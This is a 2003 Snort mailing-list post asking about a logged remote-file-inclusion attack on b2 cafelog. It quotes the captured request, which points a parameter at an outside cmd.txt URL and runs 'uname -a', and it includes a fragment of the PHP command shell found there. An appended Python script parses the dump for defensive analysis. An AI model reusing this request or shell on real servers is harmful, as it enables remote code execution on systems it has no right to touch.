[Snort-users] Is it a real attack?

Roberto Samarone Araújo (RSA) sama at ...10714...
Mon Dec 29 04:09:07 EST 2003


Hi,

Verifying the Snort logs, I found the following attack:

[nessus] WEB-PHP b2 cafelog gm-2-b2.php remote command execution attempt

000 : 47 45 54 20 2F 2F 62 32 2D 74 6F 6F 6C 73 2F 67   GET //b2-tools/g
010 : 6D 2D 32 2D 62 32 2E 70 68 70 3F 62 32 69 6E 63   m-2-b2.php?b2inc
020 : 3D 68 74 74 70 3A 2F 2F 77 77 77 2E 63 6F 72 6E   =http://www.corn
030 : 61 67 65 2E 68 70 67 2E 63 6F 6D 2E 62 72 2F 63   age.hpg.com.br/c
040 : 6D 64 2E 74 78 74 3F 3F 26 63 6D 64 3D 75 6E 61   md.txt??&cmd=una
050 : 6D 65 25 32 30 2D 61 3F 26 63 6D 64 3D 75 6E 61   me%20-a?&cmd=una
060 : 6D 65 25 32 30 2D 61 3B 65 63 68 6F 25 32 30 58   me%20-a;echo%20X
070 : 46 54 45 41 4D 20 48 54 54 50 2F 31 2E 30 0D 0A   FTEAM HTTP/1.0..
080 : 48 4F 53 74 3A 20 43 69 72 2E 69 65 73 71 6D 6A   HOST: mysite.com-
090 : 50 61 7E 65 64 75 2E 62 42 0D 0A 3D 9A            mysite.com ....

I visited the site http://www.cornage.hpg.com.br/cmd.txt and found the
following code:

-cmd  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  $output = str_replace("\n","\n-cmd ",$output);
  if (!empty($output)) echo  str_replace(">", ">", str_replace("<", "<",
$output));

?>

What kind of attack is this? Is there any place where I can find
information about this attack?

Thanks,

Robert
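
Added example (not part of the original post): the Python below rebuilds the request line from the first eight rows of the hex dump quoted above and extracts what the alert keys on, namely a query parameter whose value is a remote URL (here b2inc) and the decoded cmd values. The function and dictionary key names are this example's own, and treating "cmd" as the command parameter is an assumption taken from this one request.

```python
import re
from urllib.parse import unquote

# First eight rows of the hex dump quoted in the post (the HTTP request line).
DUMP = """\
000 : 47 45 54 20 2F 2F 62 32 2D 74 6F 6F 6C 73 2F 67   GET //b2-tools/g
010 : 6D 2D 32 2D 62 32 2E 70 68 70 3F 62 32 69 6E 63   m-2-b2.php?b2inc
020 : 3D 68 74 74 70 3A 2F 2F 77 77 77 2E 63 6F 72 6E   =http://www.corn
030 : 61 67 65 2E 68 70 67 2E 63 6F 6D 2E 62 72 2F 63   age.hpg.com.br/c
040 : 6D 64 2E 74 78 74 3F 3F 26 63 6D 64 3D 75 6E 61   md.txt??&cmd=una
050 : 6D 65 25 32 30 2D 61 3F 26 63 6D 64 3D 75 6E 61   me%20-a?&cmd=una
060 : 6D 65 25 32 30 2D 61 3B 65 63 68 6F 25 32 30 58   me%20-a;echo%20X
070 : 46 54 45 41 4D 20 48 54 54 50 2F 31 2E 30 0D 0A   FTEAM HTTP/1.0..
"""
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# offset, colon, then hex bytes each followed by one space; the ASCII column
# is separated by extra spaces, so the repeated group stops before it.
ROW = re.compile(r"^\s*[0-9A-Fa-f]+\s*:\s*((?:[0-9A-Fa-f]{2} )+)")

def request_line(dump):
    """Rebuild the payload from the hex column and return its first line."""
    payload = bytearray()
    for row in dump.splitlines():
        m = ROW.match(row)
        if m:
            payload += bytes.fromhex(m.group(1))
    return bytes(payload).split(b"\r\n")[0].decode("ascii", "replace")

def analyze(dump):
    """Return the path, remote-URL parameters and decoded cmd values."""
    _method, target, _version = request_line(dump).split(" ", 2)
    path, _, query = target.partition("?")
    found = {"path": path, "remote_include": [], "commands": []}
    # Split by hand: the URL has stray '?' characters and a repeated 'cmd',
    # which a dict-based query parser would hide.
    for pair in filter(None, query.split("&")):
        name, _, value = pair.partition("=")
        name, value = unquote(name), unquote(value)
        if value.lower().startswith(REMOTE_SCHEMES):
            found["remote_include"].append((name, value))
        elif name == "cmd":  # assumption: parameter name seen in this request
            found["commands"].append(value)
    return found

if __name__ == "__main__":
    print(request_line(DUMP))
    print(analyze(DUMP))
```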





